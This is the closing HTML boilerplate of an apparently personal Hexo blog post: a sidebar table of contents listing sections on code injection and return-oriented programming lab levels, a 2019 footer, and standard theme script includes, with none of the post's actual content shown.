                  <a href="mailto:lyh@lyh.moe" title="E-Mail &rarr; mailto:lyh@lyh.moe"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                </span>
              
            </div>
          

          

          
          

          
            
          
          

        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Part-I-Code-Injection-Attacks"><span class="nav-number">1.</span> <span class="nav-text">Part I: Code Injection Attacks</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Level-1"><span class="nav-number">1.1.</span> <span class="nav-text">Level 1</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Level-2"><span class="nav-number">1.2.</span> <span class="nav-text">Level 2</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Level-3"><span class="nav-number">1.3.</span> <span class="nav-text">Level 3</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Part-II-Return-Oriented-Programming"><span class="nav-number">2.</span> <span class="nav-text">Part II: Return-Oriented Programming</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Level-2-1"><span class="nav-number">2.1.</span> <span class="nav-text">Level 2</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Level-3-1"><span class="nav-number">2.2.</span> <span class="nav-text">Level 3</span></a></li></ol></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Steve</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
    <span title="站点总字数">21k</span>
  

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    
    <span title="站点阅读时长">19 分钟</span>
  
</div>


  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v3.8.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> v7.0.0</div>








        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

    

    
  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  <script src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>


  


  <script src="/js/src/utils.js?v=7.0.0"></script>

  <script src="/js/src/motion.js?v=7.0.0"></script>



  
  


  <script src="/js/src/affix.js?v=7.0.0"></script>

  <script src="/js/src/schemes/pisces.js?v=7.0.0"></script>



  
  <script src="/js/src/scrollspy.js?v=7.0.0"></script>
<script src="/js/src/post-details.js?v=7.0.0"></script>



  


  <script src="/js/src/bootstrap.js?v=7.0.0"></script>



  


  


  




  

  

  

  

  

  

  

  

  
  
  
  <script src="/lib/pangu/dist/pangu.min.js?v=3.3"></script>
  <script>pangu.spacingPage();</script>


  

  

  

  

</body>
</html>
